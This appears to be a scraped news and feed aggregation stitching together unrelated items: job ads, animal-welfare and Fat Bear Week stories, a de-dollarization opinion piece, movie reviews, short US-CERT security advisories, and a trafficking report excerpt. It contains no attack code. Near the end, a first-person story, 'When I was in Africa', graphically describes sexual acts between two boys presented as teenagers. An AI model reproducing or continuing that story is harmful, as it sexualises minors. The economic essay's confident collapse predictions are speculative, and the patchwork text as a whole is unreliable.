It usually lives in Taiwanese forests at 200 to 2,000 m altitude, but it can now be seen along the mountain roads of Taipei, the capital. Consequently, macaques come to pilfer crops and are often victims of gunshots and traps.

Many are taken in by the PTRC (the refuge we told you about in connection with the black bear) because they are either injured or orphaned. The care staff and keepers do everything to release as many as possible, but the process is complex, and the refuge is running out of space and money to take in more.

Jimmy Page

Photo credit: © Jimmy Beunardeau


What conclusions can be drawn from the march against fur in Paris?

Because today, in 2018, many animals are still exploited for their fur (and their skin). Because 150 million animals are killed every year around the world for their fur. Associations and animal-rights advocates decided to gather and march to denounce the exploitation of animals for their skin.

On Saturday 6 October 2018, a march against fur was therefore organised in Paris. The meeting point was set for 12 noon at the Place de la République. The aim of the event: to "gather to be heard, raise consumer awareness and make retailers react to this utterly abject market in the 21st century".

Changing attitudes

Following the campaigns of several animal-protection associations, several big names in fashion have decided to ban fur in recent years, such as Stella McCartney and Calvin Klein and, more recently, Giorgio Armani, Michael Kors, Gucci, Versace and Kooples. In early September, Burberry in turn announced that it would stop using fur in its collections. Note also that London Fashion Week decided, for its 2018 edition (14 to 18 September), to show fur-free designs. Many brands, however, still use animal fur...

Faced with this sad state of affairs, the associations therefore keep fighting, as with this mobilisation on 6 October 2018 in Paris, which brought together hundreds of citizens around the animal cause.

Tonight at 9 p.m. on France 2, the fur industry is in Élise Lucet's sights. An episode of "Cash Investigation", presented by Élise Lucet on France 2, will be devoted tonight to the conditions in which fur animals are farmed.

Continuing the fight

"There are associations like ours fighting animal suffering, but since there are no laws, we have no official counterparts. None of these animals, from the farm to the slaughterhouse, have any protection or any rights."

These are the outraged words of Chi Szuching, the young whistleblower and Chinese representative of the NGO PETA. The association describes the terrible conditions in which fur animals are farmed.

"China is the world's leading fur producer. 70 million animals are killed there every year for their skin. No law regulates the farms or the slaughterhouses. The animals urinate and defecate in their cages. Some develop skin diseases. Bites from their cage-mates are observed. The foul smell catches in the throat and nobody cleans."

Tonight, the Cash Investigation journalists investigate whether the big European luxury brands source from these farms...

Photographs in the article: © Jimmy Beunardeau

Jimmy Page


Front-End Programmer - CORPIQ - Saint-Laurent, QC
Writes user manuals and operating manuals for the systems developed. CORPIQ is looking for you....
From Indeed - Tue, 09 Oct 2018 19:38:13 GMT - View all Saint-Laurent, QC jobs
How to automatically unlock a LUKS-encrypted volume when LinuxMint boots?
In a previous article, I talked about how to have a LUKS volume mounted automatically when LinuxMint starts. That let you have the password prompted when LinuxMint launches, rather than once the operating system is fully initialised. This article will show you how to create a key file, […]
The World Is Quietly Decoupling From The US... And No One Is Paying Attention

Authored by Alt-Market's Brandon Smith via Birch Gold Group,

Blind faith in the U.S. dollar is perhaps one of the most crippling disabilities economists have in gauging our economic future. Historically speaking, fiat currencies are animals with very short lives, and world reserve currencies are even more prone to an early death. But, for some reason, the notion that the dollar is vulnerable at all to the same fate is deemed ridiculous by the mainstream.

This delusion has also recently bled into parts of the alternative economic movement, with some analysts hoping that the Trump Administration will somehow reverse several decades of central bank sabotage in only four to eight years.

However, this thinking requires a person to completely ignore the prevailing trend.

Years before there was ever an inkling of a trade war, multiple nations were establishing bilateral agreements that would cut the dollar as the primary exchange mechanism. China has been a leader in this effort, despite it being one of the largest buyers of U.S. Treasury debt and dollar reserves since the 2008 crash. In the past few years, these bilateral deals have been growing in scope, starting small and then expanding into massive agreements on raw commodities. China and Russia are a perfect example of the de-dollarization trend, with the two nations forming a trade alliance on natural gas as far back as 2014. That agreement, which is expected to start boosting imports to China this year, removes the need for dollars as a reserve mechanism for international purchases.

Russia and parts of Europe, including Germany, are also growing closer in terms of trade ties. With Germany and Russia entering into the Nordstream 2 gas pipeline deal despite condemnations from the Trump Administration, we can see a clear progression of nations moving away from the U.S. and the dollar, and into a “basket of currencies”.

Energy Secretary Rick Perry has suggested that sanctions are possible over the Nordstream project, but trade war policies only seem to be hastening the international departure from the U.S. as the center of trade influence. American sanctions on Iranian oil support this argument, as China, Russia and much of Europe are working together to sidestep U.S. restrictions on Iranian crude.

China has even instituted its own petroyuan market, and the first shipments of oil from the Middle East to China paid for through a petroyuan contract occurred in August of this year. Mainstream economists like to point out the small portion of the global oil market that the petroyuan represents, but they seem to have missed the bigger picture entirely. The issue is, now an alternative to the petrodollar exists where none existed before. And this is the crux of the matter that needs to be examined: The trend towards alternatives, and all alternatives leading to centralization by global banks.

Beyond the shift away from the U.S. dollar as a global reserve, there is a new matter of alternative international payment systems. SWIFT (Society for Worldwide Interbank Financial Telecommunication) is a global network of “financial messages” between major banks, including central banks. Transactions are recorded through the SWIFT network, which allows fast confirmation of “messages” and updates of accounts across the world.

Originally founded in Brussels, for decades SWIFT has been the only such banking network with global capacity, and until recently the primary data centers have been in the U.S. and the Netherlands.

The U.S. government has exercised extensive economic control through its influence over SWIFT, including mass surveillance of international financial transactions and denying countries like Iran access to SWIFT through sanctions. In the past, the U.S. has seized or frozen funds being transferred through SWIFT between banks outside of U.S. borders, including entirely legal transactions, indicating that the U.S. has overt control over the system. The world reserve status of the dollar, combined with U.S. influence over the most important tool in international banking transactions, has solidified U.S. fiscal dominance for many years.

But the dollar’s reign is quickly coming to an end, as global banks like the IMF seek to centralize monetary authority under a single world structure. The great illusion being perpetrated is that the “multi-polar world order” that is arising is somehow “anti-globalist”. This is simply not the case.

So, what is actually happening? The world is getting smaller as everyone EXCEPT the U.S. is consolidating economically. This includes alternatives to SWIFT.

Russia dumps U.S. Treasuries but maintains close ties to the IMF and BIS, calling for a world currency system under the IMF’s control. China does the same, increasing ties to the IMF through its SDR basket system, while cutting its ties to the dollar one by one. Europe is embracing closer trade with both Russia and China, working to defy U.S. sanctions.

Now, all of these nations are building new SWIFT-like networks in order to cut the U.S. out of the loop. In other words, the U.S. is becoming the bumbling villain of our global soap opera, and through its own hubris, it is setting the stage for its own destruction. The U.S. is acting as a catalyst, helping global banks by frightening enemies and allies into further centralization. At least, that is the narrative I suspect future historians will repeat.

As part of the effort to undermine U.S. sanctions on Iranian oil, the EU has established a program to construct a new SWIFT system outside of U.S. influence. It is a model that Russia, China and Iran have agreed to participate in, and the news has gone mostly ignored by the mainstream. The Wall Street Journal begrudgingly reported on the development but dismissed it as ineffective in thwarting U.S. sanctions. And this seems to be the consensus among the MSM – to shrug off or ignore the implications of an alternative SWIFT.

Dollar bias rears its ugly head once again, and the dangers of this kind of denial are many. The dollar can be, and is being, bypassed through bilateral trade deals. U.S. dominance of oil markets is being bypassed through alternative petro-contracts. And now, U.S. control of financial networks is being bypassed through alternative SWIFT programs. The only thread that is holding the dollar and, by extension, the U.S. economy together is the fact that these alternatives are not widespread yet. This will inevitably change.

So, the question is – When will it change?

I believe the pace of the trade war will dictate the pace of the de-dollarization shift. The more aggressive that tariffs become between the U.S. and China, Iran, Europe and Russia, the faster that already existing alternative systems will be implemented. Currently, the speed of the U.S.-China conflict suggests a move away from the dollar and into an international basket of currencies by the end of 2020, with the process taking approximately another decade to become concrete.  That is to say, the SDR basket system will act as a bridge over time to a new world reserve currency; a single global currency system.

With current tariffs encompassing at least half of Chinese trade, and the other half under threat if China retaliates in any way, I believe that it is only a matter of months before China uses its own dollar and treasury reserves as a weapon against the U.S. And, when this happens, China will not announce the move publicly, nor will the mainstream media pick up on the event until it is far too late.

Do not expect Europe to come to the aid of America if this happens. To me, it seems to be clear from the EU’s recent behavior that they plan to remain neutral, at the very least during escalation, if not fully side with China and Russia out of economic necessity.

Preparing for this event requires as much financial independence as possible. This means tangible alternatives to the dollar, like precious metals, and localized economies based on barter and trade. Once the dollar loses world reserve status the transfer of price inflation into the U.S. will be immense. Dollars held overseas will come flooding back into the country as they will no longer be needed for international exchange of goods and resources. This switch could occur very quickly, like an avalanche.

Again, do not expect much of a warning before foreign creditors dump dollar-based assets, and do not expect a large window of time before the negative effects are visible on Main Street.

*  *  *



Consultant - Vulnerability and Penetration Tester - Valencia IIP Advisors - Toronto, ON
Keep oneself updated on the latest IT Security news, exploits, hacks. Vulnerability- Penetration Tester*....
From Indeed - Tue, 09 Oct 2018 20:42:42 GMT
Consultant - Vulnerability and Penetration Tester - Valencia IIP Advisors - Ottawa, ON
Keep oneself updated on the latest IT Security news, exploits, hacks. Vulnerability- Penetration Tester*....
From Indeed - Tue, 09 Oct 2018 20:42:57 GMT
Chair de poule 2 : Les Fantômes d'Halloween (Goosebumps 2) trailer, French version
Sonny Quinn and his best friend from middle school, Sam, make a little money by collecting items people no longer want. That is how they discover Slappy, a strange ventriloquist's dummy straight out of an unpublished Goosebumps book...
Slappy badly wants to be part of the Quinn family alongside Sonny, his sister Sarah and their mother Kathy, but his malicious exploits go much too far. The children quickly realise they must stop this diabolical puppet at all costs. Slappy then decides to build the family he dreams of... by kidnapping Mrs. Quinn and bringing all his horrible Halloween accomplices back to life.
As their quiet little town turns into a hell populated by an army of monsters of every kind, from the most terrifying to the most hilarious, the children and their neighbour, Mr. Chu, will do everything they can to save their mother and the town from the machiavellian plans of the dreadful puppet on the loose...
Consultant - Vulnerability and Penetration Tester - Valencia IIP Advisors - Ottawa, ON
Perform security audits, risk analysis, vulnerability testing (including penetration testing and the development of exploits), and security reviews periodically...
From Indeed - Tue, 09 Oct 2018 20:42:57 GMT
Calls for legal migrant prostitution after research finds some exploited
Researchers are calling for migrant prostitution to be legalised after finding some sex workers were raped, not paid or had their passports withheld.
Democrats Can Exploit the ‘McCain Divide’ in the GOP
The Fat Bear Week finals are here. Which fat bear will reign supreme?

Welcome to Fat Bear Week at Mashable! Each fall, Katmai National Park holds a competition as Alaska’s brown bears finish fattening up for their long winter hibernation. This year, Mashable is getting in on the salmon-munching action. Check back with us all week as we follow the fat bear face-offs each day, and remember to get your votes in for each round. Happy fishing!

After six days of strong competition, the Fat Bear Week finals have arrived. Katmai National Park, where these wild bears live and hibernate, amusingly calls the pinnacle of the week-long contest "Fat Bear Tuesday." This year's Tuesday match features two profoundly fat bears, both of whom clearly exploited a Brooks River that teemed with 2018's exceptional and long run of 4,500-calorie salmon.

The showdown features Bear 409, known as "Beadnose," a former Fat Bear Week Champion who delighted the internet last week after Katmai posted images of her dramatic summertime fattening. In years past, Bear 409 has successfully raised cubs. But this year, the cub-less bear didn't need to sacrifice any fish to her largely helpless offspring.

Her competitor, Bear 747 — who really has no need for a nickname — is the fattest bear Katmai ecologist Mike Fitz has ever seen. "He seems to be more hippopotamus than bear at times," Katmai ranger Andrew Lavalle noted last week.

Voting opened at 10 a.m. ET on the Katmai Facebook page, and the winner will be announced at 7 p.m. ET. To vote, simply click on the images of the bear you choose as the 2018 champion, and then "Like" that image. Your "Like" is your official vote. To help you place an informed vote, see the ursine comparisons below.

[Images: Bear 747 and Bear 409 (NPS)]

Here are other images of each bear, to clear up any uncertainties as to which bear has fattened up the most this summer.

[Images: Bear 409 and Bear 747 (NPS)]

Whoever becomes the crowned champion, each of these bears — all 13 in the competition — has shown itself to be well-prepared for the long, unrelenting Alaskan winter. They won't eat for six months, and during that time will lower their metabolisms in profound ways. In their coma-like state, the bears gradually consume their ample fat stores, and awake each spring in remarkably good health. But when they emerge from their dens, both bears 409 and 747 will be quite skinny. They'll likely return to Katmai's Brooks River and start fishing, obsessively, once again.



Yarni & Javi – Sakura [EXPDIGITAL173]
ARTIST: Yarni & Javi
TITLE: Sakura
RELEASE DATE: 2018-09-24
LABELS: Exploited
STYLE: Deep House
FORMAT: MP3
QUALITY: 320kbps
SIZE: ~30.8 Mb
Tracklist:
Yarni & Javi – Next Of Kin (Original Mix) 6:14 /118bpm/ Dmin
Yarni & Javi – Sakura (Original Mix) 6:56 /120bpm/ D#min
Machinist - Groupe G7 - Sept-Îles, QC
Under the direction of the plant manager, the machinist will: Set up and operate precision metal cutting and grinding machines...
From Indeed - Tue, 09 Oct 2018 18:20:11 GMT
Machinist - Groupe SFP ressources humaines - Fermont, QC
*ArcelorMittal Exploitation minière Canada s.e.n.c.* is the world's number one in steel and mining operations and has more than 220,000 employees... $39.76 - $45.10 an hour
From Indeed - Wed, 01 Aug 2018 19:33:47 GMT
The newcomers at the Marché des Producteurs
The Marché des Producteurs de Nouvelle-Aquitaine is back, and stays until the end of the Salon de l'Agriculture. A brand of the Chambres d'Agriculture, the ten or so vendors present offer only what they produce on their own farms. This year, the stands, arranged around a large central table, have made room for some newcomers. Sacha Lacour-Arjeau, in his twenties, from the Barthes farm based in Camarsac (33), comes to the Marché for the first time to present his poultry, as does young Floriane Laville, a red-fruit grower in Bruges (33). Jean-Pierre Gastellou, of Maison Gastellou in Saint-Jean-Pied-de-Port (64), offers his charcuterie and Basque cakes for sale.
The National Rifle Association recruits LGBTQ gun owners even as it denigrates community

National Rifle Association national spokesperson Dana Loesch continued the group’s tactic of offering surface-level support for LGBTQ gun ownership while simultaneously spouting attacks against the LGBTQ community from the organization’s news outlet, NRATV.

During the October 5 edition of her NRATV show Relentless, Loesch highlighted the “LGBTQ community and Second Amendment advocates working together” at the 33rd Annual Gun Rights Policy Conference in Chicago, where pro-gun LGBTQ groups the Pink Pistols and Operation Blazing Sword announced their merger.

Loesch claimed that gun ownership “is an obvious fit for the LGBT community” and owning a gun is about “refusing to be a victim, whether you’re part of the gay community, or an ethnic minority, or whether you’re a single woman”:

DANA LOESCH (HOST): Any group that is more susceptible to violence will obviously and clearly want to protect itself. And that’s exactly why supporting the human right to self-defense is an obvious fit for the LGBT community.

LOESCH: That’s really what this is all about -- refusing to be a victim, whether you’re part of the gay community, or an ethnic minority, or whether you’re a single woman. I mean, it’s not about identity politics. But some individuals, and I’ve described before the perpetrator behind Pulse nightclub, or the individual who killed a teenager in the East Coast before then targeting a gay club in Seattle and said that he did it specifically because their lifestyles were antithetical to his radicalized beliefs. It does exist and it has happened in the United States. It’s not about identity politics, it’s about protecting yourself and other individuals.

While she encourages members of the LGBTQ community to own firearms, Loesch has also promoted hateful and anti-LGBTQ rhetoric in the past -- comparing an anti-gay baker having to serve a gay couple to “slavery” and claiming that transgender individuals have a “mental illness.”

Referring to Chelsea Manning, a transgender woman, Loesch said earlier this year on NRATV, “Just because you get some boobs, and you put some red lipstick on, poorly applied, and a very poor smoky eye bad dye job, that don’t make you a chick.”

National Rifle Association board members and organization leaders have a well-documented track record of espousing bigoted and homophobic rhetoric toward LGBTQ people while also exploiting violence against them to promote fear and increased gun ownership, a strategy that enriches gun manufacturers that donate to the NRA.


Selection - The best gaming headsets
Update of 10/10/2018: Added to the selection the Plantronics RIG 500 Pro headset, which comes in three variants and stands out as one of the most versatile models of the moment. In video games, the image is one of the main vectors of immersion and enjoyment, but the importance of sound must not be denied. As the great fans of dreamlike soundtracks (and of explosions that make your eardrums bleed) that we are, we can attest to it. All the headsets in this selection are PC-compatible. The PlayStation 4 / Pro (which has a jack port on its DualShock 4 controller) requires a headset with a 4-pole 3.5 mm jack to use sound and microphone at the same time. On Xbox One / X, note that besides the peripherals marked as compatible, most can work either by using the jack port on recent controllers, or by using the stereo headset adapter for the Xbox One controller (an accessory sold for €23) on the first Xbox One controllers, which lack a jack. By Cliint (Matthieu Chartier) and BobaFett (Jean-Marc Delprato). See also: How to choose the right gaming headset?
How to Use Fail2ban to Secure Your Linux Server

TecMint: By reviewing your server logs, you may often find different attempts for brute force login, web floods, exploit seeking and many others.


Movies I Watched in August, Part 2
Wrapping things up for the much-overdue August recap. Look for the September movies soon, because I've got a plan that might make these reviews a tad more current...


Rumor has it this was one of Stanley Kubrick’s favorite movies, and it’s not hard to see why. Though it’s a comedy – and a hilarious one – it’s also an oft-excruciating vivisection of, as the title says, modern romance, circa 1981. Albert Brooks stars, directs and co-writes (with Monica Johnson) the story of Robert Cole, a Hollywood editor stuck in an on-again, off-again, on-again, etc. relationship with the much more stable Mary Harvard (Kathryn Harrold). It’s deceptively low-key and simple, with no crazy plot twists to get in the way of Brooks’ breathtakingly neurotic (and endless) worrying. The movie starts with Brooks confidently dumping her, then charts his descent into madness as he schemes to get her back. Though it’s packed with some telltale ‘80s elements – Quaaludes, jogging, cocaine at parties – it’s oddly timeless in its themes of obsession, desire and insecurity. Most of all, like I said, it’s truly hilarious, possibly Brooks’ most consistently funny film (which is really saying something). Even beyond the relationship stuff, there’s also a very funny scene where Bob Einstein (aka Marty Funkhouser, aka Brooks’ big brother) pressures Albert into buying way too much jogging paraphernalia and some classic sequences involving the editing work, with wonderful support from Bruno Kirby, James L. Brooks and, believe it or not, George Kennedy. One of the great comedies of the 1980s, to be sure, and probably all time.


It’s always risky to make a statement like this about a movie, especially when it’s practically brand-new, but I honestly think this might be one of the best action films I’ve ever seen. It’s packed with jaw-dropping sequences, including a fight in a bathroom that ranks with some of the best close-quarter combat of all time (and even remembers to include a crucial plot point about a mask-making device). Most of the hype surrounding “Mission: Impossible – Fallout” involved star Tom Cruise’s almost extra-human dedication to the film, performing death-defying stunts and working tirelessly to make the movie succeed. Though I’m skeptical of Cruise’s involvement with a certain religion, there’s no denying he really makes this movie something special. It’s more than the stunts and action scenes, though, and by the time we got to the (truly spectacular) helicopter chase that ends the film, I think I realized what it is: Cruise’s character, Ethan Hunt, has an almost supernatural confidence that, somehow, doesn’t come across as arrogant. It’s simply a belief that he can (and will) save the day, no matter how the odds are stacked against him (and, of course, by the end, they’re stacked pretty damned high). It’s like Kirk in “Wrath of Khan” – he just doesn’t believe in the no-win scenario. It sounds silly, and maybe it is, but by the time he’s hanging from a rope under a speeding helicopter, I was 100 percent with him.


If there were any justice in this world, the fine folks at Something Weird Video would win one of those honorary Oscars for their contribution to film history, namely saving (and releasing) hundreds of insanely obscure, insanely strange movies that otherwise would never see the light of day. For instance, this 1968 sexploitation non-classic about a sketchy lesbian gang that kidnaps the boy-toy of a rich woman, who hires a private eye to track him down. As is usually the case, the plot itself is a fragile skeleton upon which the filmmakers (writer Diana Paschal and uncredited director Harry Wuest) hang endless scenes of semi-nude dancing, semi-nude wrestling and other semi-nude activities. It’s a terrible movie by any sane, objective measure, but it is fascinating if you’re a fan of these things. The whole movie, with its out-of-nowhere violence and girl gang aesthetic, resembles a bargain-basement version of a Russ Meyer movie – though it's nowhere near as good. And special credit must be given to actress Marni Castle, who plays both Brenda McClain (the aforementioned wealthy woman) and girl gang leader “Big Shim.” She’s not exactly talented, but she is oddly convincing, especially as the grotesque, imposing “Big Shim.”


Ayn Rand’s philosophy is silly, and this movie is even sillier, but thanks to a great cast and some eye-popping direction by King Vidor (which, come to think of it, sounds like the name of an Ayn Rand character), this might be one of the most purely entertaining movies of Hollywood’s golden age. Gary Cooper plays Howard Roark, a put-upon architect who refuses to bend to the whims of the masses. Patricia Neal plays Dominique Francon, a Randian woman who refuses to be tamed (unless Roark is the one taming her). And, rounding out the holier-than-thou trilogy, Raymond Massey plays Gail Wynand, the oddly named, oddly motivated newspaper publisher who seemingly lusts after both of them. Add to that trio the movie’s wonderful pair of weasels – Roark’s weak-willed buddy Peter Keating (Kent Smith of “Cat People”) and scheming columnist Ellsworth Toohey (Robert Douglas, in a hilariously scenery-chewing performance). You can barely believe what’s happening and how these decidedly non-human characters are reacting, but you also can’t look away – it’s so damned much fun. Until someone does a big-budget, black-and-white adaptation of Steve Ditko’s “Mr. A,” it’s going to remain unique in movie history.


Rewatched this with my old Out of Theaters co-host BillyKulpa, and we were both amazed by just how disappointing it was. I like Daniel Craig, and I loved “Skyfall,” but this one, woof. It just didn’t hold our interest, which is the bare minimum I require in a James Bond movie. (Even "Tomorrow Never Dies" managed that simple trick.) Let’s hope the next one is a big improvement. (Nice poster, though.)

Coming up soon: Frank Reynolds! Lee Tracy! Darla Hood (as an adult)! David Soul! And a Marvel double feature!


National Air & Space Intelligence Center (NASIC) Info Session

The National Air and Space Intelligence Center is the DoD’s center of excellence for foreign air and space threats. We have over 3000 people working together daily to make sure the Nation is at the cutting edge of understanding foreign threats to US Air and Space operations. Our all-source analysts are national experts on threats that span the air, space and cyberspace domains, and NASIC is a recognized innovator in data exploitation, knowledge management, and large data storage. The Center’s world-class connectivity ensures we have physical access to key mission data and partnerships throughout the IC.

Please RSVP for this event in Handshake. 


The Brazilian army confronts illegal gold mining
As illegal gold extraction has become one of the main challenges facing the Brazilian army in the centre-west of the country, Lieutenant Wagner Pinheiro dos Santos discussed the fight of law enforcement against these criminal activities in an interview with Sputnik. Lieutenant Wagner Pinheiro said in an interview with Sputnik ...
Internship: Career Opportunities: Communication Intern - Brand Strategy M/F (10267)
Let's get acquainted. The TF1 Group operates television channels in France. But the Group is not only its channels: for more than 25 years TF1 has been diversifying its activities and now has nearly 30 subsidiaries in businesses...
Comment on Rutherford asks why the Government won’t act on petrol prices by Right of way is Way of Right
Imagine if NZ had its own oil and gas reserves to exploit, as a domestic level of production may help to offset high prices for overseas oil. Wouldn't that be good. Sadly any evidence of common sense in this Government is harder to find than any online reference anywhere to Megan Wood's son on a Labour Party website. Or Facebook.
Mechanical Draughtsman - SNC-LAVALIN INFRASTRUCTURE - Montréal, QC
We offer integrated, multidisciplinary technical expertise for designing, building and operating new transport infrastructure....
From SNC-LAVALIN INFRASTRUCTURE - Tue, 09 Oct 2018 23:16:12 GMT
Microsoft Releases October 2018 Security Updates | US-CERT

Microsoft has released updates to address multiple vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.


Adobe Releases Security Updates | US-CERT

Adobe has released security updates to address vulnerabilities in Adobe Digital Editions, Framemaker, and Technical Communications Suite. An attacker could exploit these vulnerabilities to take control of an affected system.


Apple Releases Security Updates for iCloud, iOS | US-CERT

Apple has released security updates to address vulnerabilities in iCloud for Windows and iOS. An attacker could exploit some of these vulnerabilities to take control of an affected system. NCCIC encourages users and administrators to review the Apple security pages for iCloud for Windows 7.7 and iOS 12.0.1 and apply the necessary updates.


UAE Personal Care Products Market is Set to Augment at a CAGR of 5.3%
(EMAILWIRE.COM, October 10, 2018 ) UAE personal care products market is expected to expand at a CAGR of 5.3% over the forecast period, 2017-2025 to harness USD 4.8 billion by 2025. High disposable income of people in the UAE and intense competition between major brands to exploit the opportunities...
Amazon Employee Fired for Leaking Customer Data, Exposing a Search Flaw or Both?

Amazon revealed a breach of customer data last week, but it wasn’t a data breach of the usual variety. Rather than falling prey to a cyberattack or having hackers exploit unsecured code, customer email addresses were leaked by an employee to an online reseller in exchange for money. What you need to know: 1.) A […]

The post Amazon Employee Fired for Leaking Customer Data, Exposing a Search Flaw or Both? appeared first on Adam Levin.


‘Sanctuary cities’ don’t care when restaurants exploit undocumented workers – Chicago Sun-Times
Chicago Sun-Times: As I read the article “Chinatown job agencies, Asian restaurants ‘exploit’ Latinos, say workers, suit” (Oct. 7), two questions came to mind regarding Chicago and other sanctuary cities like San Francisco. On the one hand, is sanctuary first and …
Source: Chicago Restaurant News, via Google News
Heresy / Melissa Lenhardt.
"Margaret Parker and Hattie LaCour never intended to turn outlaw. After being run off their ranch by a greedy cattleman, their family is left destitute. As women alone they have few choices: marriage, lying on their backs for money, or holding a gun. For Margaret and Hattie the choice is easy. With their small makeshift family, the gang pulls off a series of heists across the West. Though the newspapers refuse to give the female gang credit, their exploits don't go unnoticed. Pinkertons are on their trail, a rival male gang is determined to destroy them, and secrets among the group threaten to tear them apart. Now, Margaret and Hattie must find a way to protect their family, finish one last job, and avoid the hangman's noose."-- Provided by publisher.
10/10/2018: Business: Why Chorus shares climbed amid exploitation claims
As the NZX50 fell 0.7 per cent on Monday, Chorus shares rose 1.03 per cent to $4.90 — close to the lines company’s all-time high of $5. Why did Chorus buck the market trend, despite claims from the Labour Inspectorate (part of MBIE) that 73 of its 75...
Nicky Sunshine Brings Solo Show CONFESSIONS OF A MASSAGE PARLOR MADAM to Broadway Comedy Club

Actress / comedian Nicky Sunshine brings her solo comedic performance "Confessions of A Massage Parlor Madam" back to the Broadway Comedy Club (318 W. 53rd Street) on Sunday, October 21, 2018. The show is produced by Top Knotch Entertainment; admission to the 6:00pm show is $15.00 in advance, $20.00 at the door, with a one-drink minimum per person. A post-show talkback focusing on violence against women, addiction, self help and sex work is scheduled. For information and reservations, go to: https://nickysunshine.com/ or call (347) 766-3001.

The 60-minute "Confessions," which is directed by Chuck Burks, is described by Nicky as "a funny, poignant look at the period she spent as a sex worker upon arriving in New York in 2002." The show - which contains adult themes, language and content - received great reviews at its 2016 premiere in Harlem and has been performed in front of sold out houses at The Producers Club and the National Black Theatre in Manhattan.

"Nicky Sunshine radiates her multiple talents in "Confessions of a Massage Parlor Madam". A brilliantly crafted one-woman tour de force! This show is intelligent, funny, honest, sometimes shocking, and hauntingly hilarious. A one of a kind journey with a massage...Ahem...message. I highly recommend it."

"'Confessions' is part testimony, part cautionary tale where I try to bring awareness to such important, timely issues as abuse, trafficking and violence," says Nicky. "I feel that the show has resonated with audience members, has given me the opportunity to discuss these issues with national media personalities including syndicated radio host Tom Joyner (Tom Joyner Morning Show), Joy Ann Reid (MSNBC), Jacque Reid (BET / 'Reid this Reid That' podcast) and to raise money for organizations including the Chicago Alliance Against Sexual Exploitation (CAASE) and Northwestern University Entertainment Alliance," she added.

A Virginia native who graduated from Northwestern University, Nicky has appeared in numerous productions including NBC's "Saturday Night Live," the Netflix original series "The Break with Michelle Wolf" and "The Vagina Monologues" at New World Stages. She has also performed on and produced several comedy shows in major NYC venues such as Nick Cannon's Fresh Faces at Gotham Comedy Club, The Times Square Arts Center and Stand-Up New York. Her reality show "A Question of Love" aired on Tuesdays on the FYI Network. "Let's Get Greedy!", Nicky's weekly adventures as a comedic food critic searching for food and fun in New York City, is broadcast weekly on Friday evenings at 11pm (EST) on Manhattan Neighborhood Network (MNN).

Broadway Comedy Club is located in the Hell's Kitchen / Theatre District of Manhattan on 53rd Street between 8th & 9th Aves. Take the "C," "E" or #1 subway to 50th Street. For more information, call: 212-757-2323.


Help Desk Technician - French / English / Spanish / Portuguese - CGI - Montréal, QC
Good knowledge of Windows NT, XP, Vista and 7 operating systems. Job description:....
From CGI - Fri, 13 Jul 2018 15:12:47 GMT - View all Montréal, QC jobs
When I was in Africa
When I was a teenager my father worked for an oil company and he would be sent overseas for months at a time. My parents were divorced and I lived with my father. When he was sent overseas and I was not in school I would accompany him. One time he was sent to Africa and I accompanied him. We stayed in a company rented house and there was a caretaker who took care of the house and did what ever household chores needed doing. His name sounded like Tekis. He was a black man in his early 30's who was very friendly and fun to be around. He was like family to us and we were special to him as well.

When my father would be working in the field sometimes I could accompany him but when he was in the office I had to stay home. Tekis and I became good friends and I learned a great deal about his background and his family. Because we became close as family sometimes Tekis would bring his son to stay with us. His son was named Ande and he was about my age, very outgoing and had a warm personal style that made everyone feel like he was their special friend. We became very good friends and enjoyed hearing about each others country, childhood and plans for the future. When ever Ande stayed over we would stay up late and watch movies and play games.

When Ande would stay over he would stay in my room. My room had two beds, a queen sized bed I slept on and a single bed where Ande slept. We were young boys who shared a bathroom and bedroom and we would change in each others presence and were very comfortable together. Often at night when it was time to go to bed we'd both take a shower and then we'd be on my bed in our underwear talking till it was time to go to bed, then Ande would go to his bed to sleep.

One night we were up very late and we had been watching a movie that had a number of sex scenes and when we went to the bedroom the topic of girls and sex came up. I had fooled around with a few girls but never made it all the way to intercourse. Ande had more experience than I which seems to be a cultural thing. We were talking about what we had done sexually and very naturally Ande asked me if I had ever done anything with another boy. I said "no" and he told me about how he and some friends had been naked together and had touched each other and that one of his friends like to give head. It didn't seem like a bad thing to me. I think he could tell I wasn't offended and was interested as he told me about his exploits. Just as naturally as Ande asked me if I had done anything with another boy, he asked if I would I would like him to suck me. I was very horny from our discussion and I said yes, but I was scared just because I had no idea what it would feel like and the whole thing seemed risque. He told me to take my underwear off. I slipped my underwear off and laid back and suddenly I felt his warm mouth on the head of my circumcised penis. He just took the head in his mouth and just moved his tongue around slowly. It felt really good. I was just laying there enjoying how good it felt. When I masturbated I would do it very fast and get to an orgasm as quickly as I could. But this was different. I wasn't even thinking about having an orgasm. What Ande was doing just felt good but it was slow and for the longest time it just felt the same, very good, and I just laid back and thought at some point he would just stop. But eventually I could feel that feeling starting to build and finally I came in his mouth. I wasn't even thinking that I would come in his mouth, I was just absorbed in my own feelings. When he stopped and laid next to me I could see that he had an erection and I felt like I owed him something so I asked if he would like me to suck him. 
He said "of course" and he slipped off his underwear. I put my face down by his cock and it was beautiful and scary at the same time. I didn't really know what to do. I took his cock into my mouth and did for Ande what he did for me. But it wasn't long and his hips started thrusting back and forth. I guess I didn't do it very well because he slipped his hand down and started to stroke his cock as I swirled my tongue around his head. Stroked harder and harder and then when he was ready to cum he pushed my head away and he came on his stomach. We laid there together for a while and then he got up and went to the bathroom and cleaned himself up. When he came back he asked if I'd like it if he slept in my bed and I said yes. We got under the covers and talked a bit more about sex and touched each other. It was so nice having him in my bed, being able to touch his beautiful smooth black body and have his hands exploring my body. I loved touching his balls and penis, and running my hands over his smooth thighs and chest.
Re: Sex tourism in Gambia...
From www.gvnet.com I transfer the following passage.

Human Trafficking and Modern-day Slavery

The Gambia is a source, transit, and destination country for children and women trafficked for the purposes of forced labor and commercial sexual exploitation. Within The Gambia, women and girls, and to a lesser extent boys, are trafficked for sexual exploitation, in particular to meet the demand for European sex tourism, and for domestic servitude. Boys are trafficked within the country for forced begging by religious teachers and for street vending. Transnationally, women, girls and boys from neighboring countries are trafficked to The Gambia for the same purposes listed above. Primary source countries are Senegal, Mali, Sierra Leone, Liberia, Ghana, Nigeria, Guinea-Bissau, Guinea and Benin. Trafficking of Gambian boys to Senegal for forced begging and Senegalese boys to The Gambia for the same purpose is particularly prevalent. Gambian women and girls are trafficked to Senegal for domestic servitude, and possibly for sexual exploitation. Gambian women and children may be trafficked to Europe through trafficking schemes disguised as migrant smuggling. Reports in the last two years of Gambian, Senegalese, and nationals of other neighboring countries being transported from The Gambia to Spain by boat appear to be predominantly cases of smuggling rather than trafficking. - U.S. State Dept Trafficking in Persons Report, June, 2008 [
